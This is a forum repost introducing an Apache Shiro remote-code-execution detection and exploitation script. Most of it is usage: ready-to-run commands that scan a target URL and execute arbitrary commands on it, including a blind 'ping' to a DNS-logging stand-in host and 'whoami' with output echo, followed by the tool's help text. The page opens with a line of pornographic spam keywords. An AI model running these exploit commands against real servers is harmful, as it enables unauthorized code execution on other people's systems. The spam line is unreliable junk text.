精品国产人成在线_亚洲高清无码在线观看_国产在线视频国产永久2021_国产AV综合第一页一个的一区免费影院黑人_最近中文字幕MV高清在线视频

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

一個簡單的Shiro RCE檢測和利用腳本

jf_hKIAo4na ? 來源:菜鳥學安全 ? 2024-01-09 09:46 ? 次閱讀

0x01 工具介紹

一個簡單的Shiro RCE檢測和利用腳本。

0x02 安裝與使用

1、安裝需要的包

pip install -r requirements.txt

2、檢查該漏洞

python ShiroRceTool.py -m scan -u "http://example.com"

3、執(zhí)行命令 (不回顯)

python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"

4、執(zhí)行命令(嘗試回顯)

python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e

5、獲取幫助 - Get help

python ShiroRceTool.py
 ____  _     _           ____         _____           _
/ ___|| |__ (_)_ __ ___ |  _  ___ __|_   _|__   ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _  / _ | |
 ___) | | | | | | | (_) |  _ < (_|  __/| | (_) | (_) | |
|____/|_| |_|_|_|  \___/|_| _\___\___||_|\___/ \___/|_|


                        By: Hack3rHan


usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]


options:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  "exploit" or "scan".
  -u URL, --url URL     URL of the target.
  -c CMD, --cmd CMD     Command to execute.
  -e, --echo            Echo mode.

審核編輯:湯梓紅

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 檢測
    +關注

    關注

    5

    文章

    4436

    瀏覽量

    91368
  • 命令
    +關注

    關注

    5

    文章

    678

    瀏覽量

    21984
  • 腳本
    +關注

    關注

    1

    文章

    387

    瀏覽量

    14831

原文標題:一個簡單的Shiro RCE檢測和利用腳本。

文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    工作中這種檢測腳本太常見了

    檢測腳本,用來檢測本機所有磁盤分區(qū)讀寫是否都正常。
    發(fā)表于 11-07 09:42 ?328次閱讀

    Lua腳本簡單介紹

    Lua簡單介紹Lua[1]是小巧的腳本語言。作者是巴西人。該語言的設計目的是為了嵌入應用程序中,從而為應用程序提供靈活的擴展和定制功能。Lua
    發(fā)表于 08-20 06:37

    Lua腳本簡單介紹

    Lua簡單介紹Lua[1]是小巧的腳本語言。作者是巴西人。該語言的設計目的是為了嵌入應用程序中,從而為應用程序提供靈活的擴展和定制功能。Lua
    發(fā)表于 08-20 08:06

    基于DirectShow技術的RCE算法視頻加密方案

    本文設計了利用DirectShow 技術結合種新的RCE 算法實現(xiàn)視頻數(shù)據(jù)加密的方案。首先介紹了RCE 算法的加密解密過程和原理,然后
    發(fā)表于 06-26 08:52 ?35次下載

    shiro簡單教程,環(huán)境搭建,權限控制,登陸驗證

    shiro簡單教程,環(huán)境搭建,權限控制,登陸驗證
    發(fā)表于 09-09 08:18 ?9次下載
    <b class='flag-5'>shiro</b><b class='flag-5'>簡單</b>教程,環(huán)境搭建,權限控制,登陸驗證

    Apache Shiro框架的詳細資料說明

    對新的用戶機制并不熟悉,導致出現(xiàn)問題時耗費了大量的時間來進行修復。因此,我認為我有必要編寫此文來介紹下新的 Shiro 用戶機制。
    發(fā)表于 03-08 08:00 ?4次下載
    Apache <b class='flag-5'>Shiro</b>框架的詳細資料說明

    如何創(chuàng)建和執(zhí)行簡單的Linux shell腳本

     如果您愿意要嘗試更長的shell腳本,請將下面的shell腳本(并附加為PDF和ODT文件)復制到文本編輯器中,保存,使其可執(zhí)行并運行。當您了解更多Linux命令時,您可以創(chuàng)建更復雜的shell腳本
    的頭像 發(fā)表于 11-06 17:28 ?1.3w次閱讀

    如何巧妙利用HFSS腳本錄制功能

    。 摘要: 在學Antenna:HFSS腳本建模入門中,介紹了利用HFSS自帶的Record Script To File功能進行腳本錄制。但是大部分情況下,工程師們只是希望錄制
    的頭像 發(fā)表于 07-29 11:15 ?3215次閱讀

    109實用shell腳本分享

    Shell腳本,就是利用Shell的命令解釋的功能,對純文本的文件進行解析,然后執(zhí)行這些功能,也可以說Shell腳本就是
    的頭像 發(fā)表于 03-16 08:58 ?2590次閱讀

    如何創(chuàng)建簡單腳本

    Shell 腳本可以為您節(jié)省時間和精力,但是如果您不保護您的密碼,它們就會成為您的負擔。以下是如何保持安全的方法。
    的頭像 發(fā)表于 10-10 11:12 ?8431次閱讀

    shiro綜合利用工具介紹

    shiro綜合利用工具:ShiroExp ? 工具介紹 shiro把梭工具,該輪子主要有三大功能如下: 1、默認密鑰爆破 利用Simple
    的頭像 發(fā)表于 10-24 11:14 ?5304次閱讀

    利用Python寫了監(jiān)控服務器資源利用率的腳本

    研究了腳本,其主要目的是:基于 Python 編程語言來監(jiān)控服務器的 CPU、內存、/目錄、/appslog、/bigdata目錄使用率以及網(wǎng)卡接收和發(fā)送情況。
    的頭像 發(fā)表于 01-29 15:08 ?661次閱讀

    shiro如何實現(xiàn)Web應用認證

    前面簡單介紹了shiro這個框架的些基本知識,包括其架構模型,主要的功能,關鍵名稱的含義,以及核心模塊和對應的接口定義。 開始的話 今天我們從
    的頭像 發(fā)表于 10-08 14:53 ?486次閱讀
    <b class='flag-5'>shiro</b>如何實現(xiàn)Web應用認證

    Shiro功能介紹

    記得做的第一個Web項目,系統(tǒng)認證授權這塊就是基于Shiro實現(xiàn)的,當時也是第次接觸到這種類型的框架,同時是基于Spring做的集成,并且相關的配置都已經(jīng)是定制好的,只需要我們根據(jù)項目情況對極少
    的頭像 發(fā)表于 10-08 15:07 ?467次閱讀
    <b class='flag-5'>Shiro</b>功能介紹

    編寫點名器腳本

    目的:編寫腳本,可以將準別好的名字合集的.txt傳入腳本,然后每次隨機顯示一個人的姓名
    的頭像 發(fā)表于 11-06 12:41 ?564次閱讀
    編寫<b class='flag-5'>一</b><b class='flag-5'>個</b>點名器<b class='flag-5'>腳本</b>